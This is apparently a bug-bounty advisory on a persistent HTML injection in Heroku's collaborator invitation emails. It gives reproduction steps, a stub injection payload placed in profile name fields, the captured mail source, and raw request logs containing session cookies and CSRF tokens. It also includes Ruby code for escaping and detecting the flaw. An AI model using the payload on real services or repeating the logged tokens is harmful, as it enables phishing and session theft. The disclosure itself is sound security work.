Heroku Bug Bounty Program 2015 - Persistent Invitation Vulnerability & Video

Vulnerability researchers of the Evolution Security GmbH team discovered two application-side vulnerabilities in the official Heroku API and online-service web application. The issues were reported to the official Heroku bug bounty program in 2014 Q4.

During the last week the fixes were confirmed by officials of the company after the famous bug bounty hunter disclosed a video that demonstrates the issue to the developer team. The second issue has the same impact at another location (deep dive). We only add the link at the bottom, which becomes available in a few hours.

The Heroku dashboard is affected by a vulnerability inside the invite module. After registering an account with a script code payload as first and last name, the Heroku online service sends the name value without secure encoding inside the invitation mailing. After registration the attacker opens the access page of an app (https://dashboard.heroku.com/apps/asdsad/access) and can add any email address, so that the invitation-to-collaborate mail carries the attacker's own malicious script code. The request method used to inject the code by registration inside the app service is POST. The exploitation takes place after the local attacker adds another remote email address, streaming unauthorized persistent malicious content into the outgoing emails of the Heroku online service through an invitation to collaborate.

In the registration emails the database content is parsed into the outgoing mail. The Heroku dashboard access service does not encode the database content in the invitation-to-collaborate context, which results in the successful exploitation of the application-side issue. The bug type has been classified as a persistent mail encoding web vulnerability in the Heroku web server service, in connection with the vulnerable application module/function. The sender address is the main Heroku reply address (noreply@heroku.com). The bug is triggered in the API validation of the form that allows inviting other email contacts. The same bug is present in the same module/function of the Heroku Dashboard beta, because only the frontend was changed during the update.

The security risk of the persistent mail encoding web vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) score of 4.1. Exploitation of the persistent vulnerability in the `invitation to collaborate` module requires a low-privileged Heroku account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirects to external sources and persistent manipulation of affected or connected module context.
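The root cause described above is output encoding: a profile value stored at registration is written into the HTML part of the invitation mail as-is, and both the classic dashboard and the beta dashboard feed the same mail template. The following Ruby snippet is an added example written for this article; it is not Heroku's code and does not reproduce their templates. It puts the unsafe interpolation next to a hardened version that escapes every user-controlled value at the point it enters HTML, adds a registration-side check on display names, and a detection oracle that flags a rendered mail in which user-supplied markup survived unescaped. The sample name, email address and app name are constructed placeholders.

```ruby
require "erb"

# Constructed sample: a display name carrying markup, of the shape the advisory
# describes being stored in the first-/last-name profile fields at registration.
SAMPLE_NAME  = %q{"><img src="x"> >"<iframe src="a">}
SAMPLE_EMAIL = "inviter@example.test"   # placeholder, not an address from the advisory
SAMPLE_APP   = "exampleapp"             # placeholder app name

# Unsafe rendering (the behaviour the advisory describes): the stored name is
# interpolated into the HTML part of the mail with no output encoding.
def render_invite_html_unsafe(name, email, app)
  %(<p>#{name} (#{email}) has invited you to collaborate on their app "#{app}" on Heroku.</p>)
end

# Hardened rendering: every user-controlled value is HTML-escaped where it is
# written into the HTML part, so markup in a profile field becomes inert text.
# Doing this in the template means both dashboard frontends are covered.
def render_invite_html(name, email, app)
  h = ->(s) { ERB::Util.html_escape(s.to_s) }
  %(<p>#{h[name]} (#{h[email]}) has invited you to collaborate on their app "#{h[app]}" on Heroku.</p>)
end

# The text/plain alternative needs no HTML escaping; mail clients render it as
# text. Keep it a separate template rather than reusing the HTML body.
def render_invite_text(name, email, app)
  "#{name} (#{email}) has invited you to collaborate on their app \"#{app}\" on Heroku."
end

# Registration-side check: a display name should not carry HTML metacharacters
# at all. Returns true when the name is acceptable. (Assumed policy: max 100
# characters, no < > " ' characters.)
def acceptable_display_name?(name)
  return false if name.nil? || name.strip.empty? || name.length > 100
  !name.match?(/[<>"']/)
end

# Detection oracle for already-rendered mail: does the HTML body still contain,
# verbatim, a user-controlled value that itself contains a tag? Usable as a unit
# test or as a last check before handing the message to the MTA.
def user_markup_leaked?(html, *user_values)
  user_values.any? { |v| v.to_s.match?(/<[a-z]/i) && html.include?(v.to_s) }
end

if __FILE__ == $PROGRAM_NAME
  unsafe = render_invite_html_unsafe(SAMPLE_NAME, SAMPLE_EMAIL, SAMPLE_APP)
  safe   = render_invite_html(SAMPLE_NAME, SAMPLE_EMAIL, SAMPLE_APP)
  puts "unsafe body leaks markup: #{user_markup_leaked?(unsafe, SAMPLE_NAME)}"
  puts "hardened body leaks markup: #{user_markup_leaked?(safe, SAMPLE_NAME)}"
  puts "name accepted at registration: #{acceptable_display_name?(SAMPLE_NAME)}"
end
```

The escaping in `render_invite_html` is the actual fix; the name check is defence in depth and does not replace it, since a name that passes one filter today may be stored by another path tomorrow. The oracle is deliberately simple: it only asks whether a user value containing a tag reached the body unchanged, which is exactly the condition visible in the captured mails above.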

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Heroku Dashboard > Apps > User[x] > Access
[+] Heroku Dashboard Beta > Apps > User[x] > Access

Vulnerable Function(s):
[+] Invitation to Collaborate
[+] Invitation

Affected Module(s):
[+] API

Proof of Concept (PoC):
The persistent mail encoding web vulnerability can be exploited by remote attackers with a low-privileged application user account and low user interaction. To demonstrate or reproduce the security vulnerability, follow the information and steps below.

Manual steps to reproduce the security vulnerability ...

1. Register an account with a script code payload in the first- and last-name input fields
2. Save the context and access the account
3. Register a new random app inside the dashboard
4. Switch to the Apps > Access section in the regular dashboard or via the beta template
5. Add any random email or Heroku user account mail to the access rules and save the context
Note: A notification mail arrives in the inbox of the newly registered access user
6. The payload executes in the mail body context because of the payload registered inside the user profile values
7. The persistent web vulnerability has been reproduced successfully!

PoC: Mail Header > Source

----==_mimepart_53fe30f6c9dbf_79c5a2a6ac74767
Content-Type: text/plain;
charset=UTF-8
Content-Transfer-Encoding: 7bit

"><img src="x">%20%20>"<iframe src=a>%20<iframe>[PERSISTENT INJECTED SCRIPT CODE VIA INVITE TO COLLABORATE HERE!!!] (admin@evolution-sec.com) has invited you to collaborate on their app "asdsad" on Heroku:http://asdsad.herokuapp.com/
Since you already have an account with Heroku, you can get started by simply git cloning the app repository:

PoC: Invite to Collaborate (noreply@heroku.com)

<td style="vertical-align: top; text-align: left; padding: 0;" align="left" valign="top">
<h1 id="logo" style="color: #6E5BAA; display: block; font-family: hybrea, proxima-nova, 'helvetica neue', helvetica,
arial, geneva, sans-serif; font-size: 32px; font-weight: 200; text-align: left; margin: 0 0 40px;" align="left">
<img src="http://heroku.newsletter.s3.amazonaws.com/hk-logo.png" alt="heroku" style="outline: none; text-decoration: none; border: 0;" height="42" width="120"></h1>

<p style="margin: 20px 0;">"><img src="x">%20%20>"<iframe src="a">%20<iframe>[PERSISTENT INJECTED SCRIPT CODE VIA INVITE TO COLLABORATE HERE!!!] (admin@evolution-sec.com) has
invited you to collaborate on their app "<a href="http://asdsad.herokuapp.com/" style="color: #6E5BAA;">asdsad</a>" on Heroku.</p>
<p style="margin: 20px 0;">Since you already have an account with Heroku, you can get started by simply git cloning the app repository:</p>
<blockquote style="border-radius: 5px; font-family: courier, monospace; background: #ebeaef; margin: 10px 0; border: 10px solid #ebeaef;">
  <span class="shell" style="color: #6E5BAA;">$</span> git clone git@heroku.com:asdsad.git -o heroku
</blockquote>
<p style="margin: 20px 0;">See <a href="http://devcenter.heroku.com/articles/collab" style="color: #6E5BAA;">our quickstart guide</a> for additional information</p>
                        <p style="margin: 20px 0;">
                          The Heroku Team<br />
                          <a href="https://heroku.com" style="color: #6E5BAA;">https://heroku.com</a>
                        </p>
                      </td>
                    </tr>
                  </table>
                </td>
              </tr>
              <tr style="vertical-align: top; padding: 0;">
                <td class="templateContainerPadding" align="center" valign="top" style="vertical-align: top; padding: 0 40px;">
                  <table id="footerContent" style="border-spacing: 0; border-collapse: collapse; font-family: proxima-nova, 'helvetica neue',
helvetica, arial, geneva, sans-serif; height: 100%; width: 100%; border-top-style: solid; border-top-color: #ebeaef; color: #999999; font-size: 12px;
background: #ffffff; margin: 0; padding: 0; border-width: 1px 0 0;">
                    <tr style="vertical-align: top; padding: 0;">
                      <td valign="top" style="vertical-align: top; text-align: left; padding: 0;" align="left">
                        <p style="margin: 20px 0;">
                          Heroku is the cloud platform for rapid deployment and scaling of web applications. Get up and running in minutes, then deploy instantly via Git.
                        </p>
                        <p style="margin: 20px 0;">
                          To learn more about Heroku and all its features, check out the Dev Center: <a href="https://devcenter.heroku.com/articles/quickstart"
style="color: #666666;">https://devcenter.heroku.com/articles/quickstart</a>
                        </p>
                      </td>
                    </tr>
                  </table>
                </td>
              </tr>
            </table>
          </td>
        </tr>
      </table>
    </center>

<style type="text/css">
... ... ... ...
  }
}
</style>
</body>
</html>
</body>
</html>
</iframe></p></td>

--- Poc Session Logs [POST] [Invite to Collaborate] (Notification API) ---
21:26:26.784[414ms][total 414ms] Status: 302[Found]
POST https://dashboard.heroku.com/apps/asdsad/access

Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[dashboard.heroku.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]

    Accept-Encoding[gzip, deflate]
      Referer[https://dashboard.heroku.com/apps/asdsad/access]
      Cookie[_ga=GA1.2.1421671373.1409166519; __utma=148535982.1421671373.1409166519.1409166519.1409166519.1; 

__utmb=148535982.57.10.1409166519; __utmc=148535982; __utmz=148535982.1409166519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C

%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D;
optimizelyEndUserId=oeu1409166535240r0.4472799890466287; optimizelyBuckets=%7B%7D;
mp_5414bf80e043619b56a936d7c7fe54d3_mixpanel=%7B%22distinct_id%22%3A%20%222014-08-27%2019%3A09%3A15%20UTC%208fc99130-104b-0132-866c-062d1b005a52%22%2C%22%24
initial_referrer%22%3A%20%22https%3A%2F%2Fdevcenter.heroku.com%2Farticles
%2Fdynos%22%2C%22%24initial_referring_domain%22%3A%20%22devcenter.heroku.com%22%7D; heroku_session=1; heroku_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3; _my-
heroku_session=BAh7CEkiEF9jc3JmX3Rva2VuBjoGRUZJIjFVSjJjTnVhQ1MxN09nTFJ6YVYzay9lY0NRQXZaZ1FIZ0xrR2l2ZHFpcHVnPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWM3MGU4YjlmYjk4MTc0Y2I5Nj
MxOTU4MmRiZGFkNDE1BjsAVEkiC2luX29yZwY7AEZG--
19be2343ca827f40ab20fc07e7093201c381af2c;
user_session_secret=BAhJIgKiBUx6Rm... ... ... JiZGNkBjoGRUY%3D--1a29e7f4569b51d2db15f168457ce65b8c627b9c;
dashboard_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3;
_ga=GA1.3.1421671373.1409166519; 

__utma=155166509.1421671373.1409166519.1409166827.1409166827.1; __utmb=155166509.9.10.1409166827; __utmc=155166509;
__utmz=155166509.1409166827.1.1.utmcsr=devcenter.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/articles/dynos; 

visitor_id36622=271240760; flash=%7B%7D]
      Connection[keep-alive]
   POST-Daten:
      utf8[%E2%9C%93]
      authenticity_token[UJ2cNuaCS17OgLRzaV3k%2FecCQAvZgQHgLkGivdqipug%3D]
      user%5Bemail%5D[bkm%40evolution-sec.com]
      commit[Invite]
   Response Header:
      Cache-Control[no-cache, no-store, must-revalidate]
      Content-Type[text/html; charset=utf-8]
      Date[Wed, 27 Aug 2014 19:26:46 GMT]
      Expires[0]
      Location[https://dashboard.heroku.com/apps/asdsad/access]
      Pragma[no-cache]
      Request-Id[63991fba-fbb1-492d-8b22-866fa6111cb9]
      Server[nginx/1.5.7]
      Set-Cookie[flash=%7B%22notice%22%3A%22bkm%40evolution-sec.com+has+been+added+to+the+app+asdsad.%22%7D; domain=dashboard.heroku.com; path=/; secure]
      status[302 Found]
      Strict-Transport-Security[max-age=31536000]
      X-Frame-Options[SAMEORIGIN]
      X-Rack-Cache[invalidate, pass]
      X-Request-Id[63991fba-fbb1-492d-8b22-866fa6111cb9]
      x-runtime[0.230753]
      x-ua-compatible[IE=Edge,chrome=1]
      Transfer-Encoding[chunked]
      Connection[keep-alive]

21:26:27.201[474ms][total 1293ms] Status: 200[OK]
GET https://dashboard.heroku.com/apps/asdsad/access Load Flags[LOAD_DOCUMENT_URI  LOAD_REPLACE  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[13369] Mime Type[text/html]
   Request Header:
      Host[dashboard.heroku.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://dashboard.heroku.com/apps/asdsad/access]
      Cookie[_ga=GA1.2.1421671373.1409166519; __utma=148535982.1421671373.1409166519.1409166519.1409166519.1; 

__utmb=148535982.57.10.1409166519; __utmc=148535982; __utmz=148535982.1409166519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C
%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D;
optimizelyEndUserId=oeu1409166535240r0.4472799890466287; optimizelyBuckets=%7B%7D; 

mp_5414bf80e043619b56a936d7c7fe54d3_mixpanel=%7B%22distinct_id%22%3A%20%222014-08-27%2019%3A09%3A15%20UTC%208fc99130-104b-0132-866c-062d1b005a52%22%2C%22%24
initial_referrer%22%3A%20%22https%3A%2F%2Fdevcenter.heroku.com%2Farticles
%2Fdynos%22%2C%22%24initial_referring_domain%22%3A%20%22devcenter.heroku.com%22%7D; heroku_session=1; heroku_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3; _my-
heroku_session=BAh7CEkiEF9jc3JmX3Rva2VuBjoGRUZJIjFVSjJjTnVhQ1MxN09nTFJ6YVYzay9lY0NRQXZaZ1FIZ0xrR2l2ZHFpcHVnPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWM3MGU4YjlmYjk4MTc0Y2I5Nj
MxOTU4MmRiZGFkNDE1BjsAVEkiC2luX29yZwY7AEZG--
SldkejA5LS0yN2FiYTY5MmM1MmQxYjgxMTk0NTRjNmQyM2Q4Y2Q2YTM1YTJiZGNkBjoGRUY%3D--1a29e7f4569b51d2db15f168457ce65b8c627b9c;
dashboard_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3;
_ga=GA1.3.1421671373.1409166519; 

__utma=155166509.1421671373.1409166519.1409166827.1409166827.1; __utmb=155166509.9.10.1409166827; __utmc=155166509;
__utmz=155166509.1409166827.1.1.utmcsr=devcenter.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/articles/dynos; 

visitor_id36622=271240760; flash=%7B%22notice%22%3A%22bkm%40evolution-sec.com+has+been+added+to+the+app+asdsad.%22%7D]
      Connection[keep-alive]
   Response Header:
      Cache-Control[must-revalidate, no-cache, no-store, private]
      Content-Type[text/html; charset=utf-8]
      Date[Wed, 27 Aug 2014 19:26:47 GMT]
      Expires[0]
      Pragma[no-cache]
      Request-Id[843d1f47-560b-4a1d-881c-fb1ec07968b9]
      Server[nginx/1.5.7]
      status[200 OK]
      Strict-Transport-Security[max-age=31536000]
      X-Frame-Options[SAMEORIGIN]
      X-Rack-Cache[miss]
      X-Request-Id[843d1f47-560b-4a1d-881c-fb1ec07968b9]
      x-runtime[0.287221]
      x-ua-compatible[IE=Edge,chrome=1]
      Content-Length[13369]
      Connection[keep-alive]

 

PoC: Invite via Dashboard Beta through Heroku API

<td style="vertical-align: top; text-align: left; padding: 0;" align="left" valign="top">
                        <h1 id="logo" style="color: #6E5BAA; display: block; font-family: hybrea, proxima-nova, 'helvetica neue',
helvetica, arial, geneva, sans-serif; font-size: 32px; font-weight: 200; text-align: left; margin: 0 0 40px;"
align="left"><img src="http://heroku.newsletter.s3.amazonaws.com/hk-logo.png" alt="heroku" style="outline: none; text-decoration: none;
border: 0;" height="42" width="120"></h1><p style="margin:

20px 0;">"><img src="x">%20%20>"<iframe src="a">%20<iframe>[PERSISTENT INJECTED SCRIPT CODE VIA INVITE TO HEROKU HERE!!!] (admin@evolution-sec.com) has
invited you to collaborate on their app "<a href="http://asdsad.herokuapp.com/" style="color: #6E5BAA;">asdsad</a>" on Heroku.</p>

<p style="margin: 20px 0;">Follow this link to get access:</p>

<p style="margin: 20px 0;"><a href="https://id.heroku.com/account/accept/2798200/b06b7e8d1ed89e674d607f25dab...
style="color: #6E5BAA;">https://id.heroku.com/account/accept/2798200/b06b7e8d1ed89e674d607f25dab...

<p style="margin: 20px 0;">Heroku is a cloud application platform – a new way of building and deploying web apps. Develop your app using your local tools,
then deploy via Git. After accepting the invitation, check out <a href="http://devcenter.heroku.com/articles/quickstart" style="color: #6E5BAA;">our quickstart guide</a></p>
<p style="margin: 20px 0;">To learn more about deploying apps on Heroku, <a href="http://devcenter.heroku.com" style="color: #6E5BAA;">check out the docs.</a></p>
<p style="margin: 20px 0;">Have fun, and don't hesitate to contact us with your feedback.</p>
                        <p style="margin: 20px 0;">
                          The Heroku Team<br />
                          <a href="https://heroku.com" style="color: #6E5BAA;">https://heroku.com</a>
                        </p>
                      </td>
                    </tr>
                  </table>
                </td>
              </tr>
            </table>
          </td>
        </tr>
      </table>
    </center>

--- PoC Session Logs (Invite to Heroku via Beta Theme) [POST] (Notification API) ---

22:25:24.964[743ms][total 743ms] Status: 201[Created]
POST https://dashboard-next.heroku.com/api/apps/2737d28a-9acd-4352-a3d4-b3efb...

Load Flags[LOAD_BYPASS_CACHE  LOAD_BACKGROUND  ] Größe des Inhalts[211] Mime Type[application/json]
   Request Header:
      Host[dashboard-next.heroku.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
      Accept[application/vnd.heroku+json; version=3]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Content-Type[application/json; charset=UTF-8]
      X-CSRF-Token[IKbYx6U4o8Drv7vgoT9gX45Jegk+XVigarkg4=]
      X-Requested-With[XMLHttpRequest]
      Referer[https://dashboard-next.heroku.com/apps/asdsad/access]
      Content-Length[41]
      Cookie[_ga=GA1.2.1421671373.1409166519; __utma=148535982.1421671373.1409166519.1409166519.1409170245.2; __utmb=148535982.36.10.1409170245;
__utmc=148535982; __utmz=148535982.1409170245.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided);
optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false
%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D;
optimizelyEndUserId=oeu1409166535240r0.4472799890466287; optimizelyBuckets=%7B%7D; mp_5414bf80e043619b56a936d7c7fe54d3_mixpanel=%7B
%22distinct_id%22%3A%20%222014-08-27%2019%3A09%3A15%20UTC%208fc99130-104b-0132-866c-062d1b005a52%22%2C%22%24
initial_referrer%22%3A%20%22https%3A%2F%2Fdevcenter.heroku.com%2Farticles%2Fdynos%22%2C%22%24initial_referring_domain%22%3A
%20%22devcenter.heroku.com%22%7D; heroku_session=1; heroku_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3;
session=Zy3Pusin4kPPd6OSt9FhcA.neINSzdfS2R5CjblMoRCYUntFqVvMiYai26fqEvBjFzjfKLFCGPDOq_6gCE32OQk9SO974NplMf13oRR7W1wUpYefJ_4kYO72VsPtkRKlt1fJ_bbA13yUvVYIHHRwEvtWN_qjk7ZL-
Z09sewhk5I_YCfIEubvb4wNXAETzdbWwxLKNAf1HZQ5qkpKC4vXKpSrXIzkx1Zp1xvKuDFxayYaNA3F47iY7i-0mIdcC4qtP20EoaXPANL5YVoUdftj9LuFxMHqeolBDglB4wPTBoJO6rRYhXvF-S6D7VCQVUXUDpfHnw-
SizaiacWTAst7KBGtvMb5kUomoPk_7RqJhbWtd7l7opjWQoFdvGBlWCRCyuYQPVoEnT8RCH_cq5nkwKHMVBKFYSKTuBVDL9n6wxgkh8lofNVtL01sbCunT92Cg8QRvqLKuSfv2uPdFP0ZGDOBbxCAafFRz_7lppQ8TfA-
Dnd00DMZZoIN-Pjd84Mntn2Ev7voqqrTjMr85hLCaX48ZLlViIwIHGkyT6fn39hVBvJdWsKpYnOQx8JbbRAcXG9-z1ogW9iRO-8SvvX7OVDzujbA9mvdL2YgJ-M7loe5dNFKbPfxtJ_bVeVbfqN5rhkjn6a2-0EelwwrmT
8zaGwyCfLj6Dre30FaMRo_spHe_3WQqpmGdtccgHHVfv_fTFUwtmIPVGPV9lBNI-HdOhfTXe5vNwdMa4O_Zc8h3LJXY_SioLjT2rJpny5jyTpOmnGiKg7_5gBRrVho6a0X62v.1409166935525.86400000.SB-
x_q66Gn0thFKWXzZnGtWq4xqLkWMrXX-s6OPg4yU; __utma=155690030.1421671373.1409166519.1409166929.1409170304.2; __utmc=155690030;
__utmz=155690030.1409170304.2.2.utmcsr=dashboard.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/apps/asdsad/access;
ref=lUfOxJR7MTq-HJ0g1YRMbgJitTUh-GL28r4373os2BeJj-FIGe2wFX7CZkOr-
wrZ6tI3U09rIeKWnfQ2P0aBX2MTYoqdRAdCNgAhXXBmKMuquCTPzqlPdhEPxdpdF70J%7CwCAYZcZQpXb_iEF_o-HTSQ%3D%3D%7Ce7cb9d999af74418ae28fb1d3b50be583ed9c91ef71f71aa6080f662f8e0a0f7;
__utmb=155690030.29.10.1409170304]
      Connection[keep-alive]
      Pragma[no-cache]
      Cache-Control[no-cache]
   POST-Daten:
      {"user":"research@vulnerability-lab.com"}[]
   Response Header:
      Cache-Control[no-cache]
      Content-Type[application/json;charset=utf-8]
      Date[Wed, 27 Aug 2014 20:25:45 GMT]
      Oauth-Scope[global]
      Oauth-Scope-Accepted[global write-protected]
      Ratelimit-Remaining[2399]
      Request-Id[fb852b2b-8596-4199-8093-4bf2f5c8c0a2]
      Server[nginx/1.4.7]
      status[201 Created]
      Strict-Transport-Security[max-age=15768000]
      Vary[Accept-Encoding]
      x-content-type-options[nosniff]
      X-Download-Options[noopen]
      X-Frame-Options[DENY]
      x-runtime[0.468937]
      X-XSS-Protection[1; mode=block]
      Content-Length[211]
      Connection[keep-alive]

22:25:26.908[216ms][total 216ms] Status: 200[OK]
GET https://dashboard-next.heroku.com/alpha-api/notifications

Load Flags[LOAD_BACKGROUND  ] Größe des Inhalts[2] Mime Type[application/json]
   Request Header:
      Host[dashboard-next.heroku.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
      Accept[application/vnd.heroku+json; version=3]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Content-Type[application/json]
      X-CSRF-Token[IKbYx6U4o8Drv7vgoT9gX45Jegk+XVigarkg4=]
      X-Requested-With[XMLHttpRequest]
      Referer[https://dashboard-next.heroku.com/apps/asdsad/access]
      Cookie[_ga=GA1.2.1421671373.1409166519; __utma=148535982.1421671373.1409166519.1409166519.1409170245.2; __utmb=148535982.36.10.1409170245;
__utmc=148535982; __utmz=148535982.1409170245.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|
utmctr=(not%20provided); optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22
false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false
%22%7D; optimizelyEndUserId=oeu1409166535240r0.4472799890466287; optimizelyBuckets=%7B%7D; mp_5414bf80e043619b56a936d7c7fe54d3_mixpanel=%7B%22distinct_id
%22%3A%20%222014-08-27%2019%3A09%3A15%20UTC%208fc99130-104b-0132-866c-
062d1b005a52%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2Fdevcenter.heroku.com%2Farticles%2Fdynos%22%2C%22%24initial_referring_domain%22%3A%20%22
devcenter.heroku.com%22%7D; heroku_session=1; heroku_session_nonce=0ddb0d38-d9be-
4f65-82b4-19994d4222d3; session=Zy3Pusin4kPPd6OSt9FhcA.neINSzdfS2R5CjblMoRCYUntFqVvMiYai26fqEvBjFzjfKLFCGPDOq_6gCE32OQk9SO974NplMf13oRR7W1wUpYefJ_
4kYO72VsPtkRKlt1fJ_bbA13yUvVYIHHRwEvtWN_qjk7ZL-
Z09sewhk5I_YCfIEubvb4wNXAETzdbWwxLKNAf1HZQ5qkpKC4vXKpSrXIzkx1Zp1xvKuDFxayYaNA3F47iY7i-0mIdcC4qtP20EoaXPANL5YVoUdftj9LuFxMHqeolBDglB4wPTBoJO6rRYhXvF-
S6D7VCQVUXUDpfHnw-
SizaiacWTAst7KBGtvMb5kUomoPk_7RqJhbWtd7l7opjWQoFdvGBlWCRCyuYQPVoEnT8RCH_cq5nkwKHMVBKFYSKTuBVDL9n6wxgkh8lofNVtL01sbCunT92Cg8QRvqLKuSfv2uPdFP0ZGDOBbxCAafFRz_
7lppQ8TfA-Dnd00DMZZoIN-
Pjd84Mntn2Ev7voqqrTjMr85hLCaX48ZLlViIwIHGkyT6fn39hVBvJdWsKpYnOQx8JbbRAcXG9-z1ogW9iRO-8SvvX7OVDzujbA9mvdL2YgJ-M7loe5dNFKbPfxtJ_bVeVbfqN5rhkjn6a2-0EelwwrmT8za
GwyCfLj6Dre30FaMRo_spHe_3WQqpmGdtccgHHVfv_fTFUwtmIPVGPV9lBNI-
HdOhfTXe5vNwdMa4O_Zc8h3LJXY_SioLjT2rJpny5jyTpOmnGiKg7_5gBRrVho6a0X62v.1409166935525.86400000.SB-x_q66Gn0thFKWXzZnGtWq4xqLkWMrXX-s6OPg4yU;
__utma=155690030.1421671373.1409166519.1409166929.1409170304.2; __utmc=155690030;
__utmz=155690030.1409170304.2.2.utmcsr=dashboard.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/apps/asdsad/access;
ref=lUfOxJR7MTq-HJ0g1YRMbgJitTUh-GL28r4373os2BeJj-FIGe2wFX7CZkOr-

wrZ6tI3U09rIeKWnfQ2P0aBX2MTYoqdRAdCNgAhXXBmKMuquCTPzqlPdhEPxdpdF70J%7CwCAYZcZQpXb_iEF_o-HTSQ%3D%3D%7Ce7cb9d999af74418ae28fb1d3b50be583ed9c91ef71f71aa6080f662f8e0a0f7;
__utmb=155690030.29.10.1409170304]
      Connection[keep-alive]
   Response Header:
      Cache-Control[no-store, no-cache]
      Content-Type[application/json]
      Date[Wed, 27 Aug 2014 20:25:46 GMT]
      Etag["223132457"]
      Strict-Transport-Security[max-age=15768000]
      x-content-type-options[nosniff]
      X-Download-Options[noopen]
      X-Frame-Options[DENY]
      X-XSS-Protection[1; mode=block]
      Content-Length[2]
      Connection[keep-alive]

Reference(s):
https://dashboard.heroku.com
https://devcenter.heroku.com
https://dashboard-next.heroku.com/api/apps/2737d28a-9acd-4352-a3d4-b3efb...
https://id.heroku.com/account/accept/2798200/b06b7e8d1ed89e674d607f25dab...
https://dashboard.heroku.com/apps/asdsad/access
https://dashboard-next.heroku.com/alpha-api/notifications
https://dashboard-next.heroku.com/alpha-api
https://dashboard-next.heroku.com/

[VIDEO] Heroku API Bug Bounty Program 2014/2015 - Persistent Mail Encoding Vulnerability (Application-Side)

Advisory: http://www.vulnerability-lab.com/get_content.php?id=1300

Advisory: http://www.vulnerability-lab.com/get_content.php?id=1398
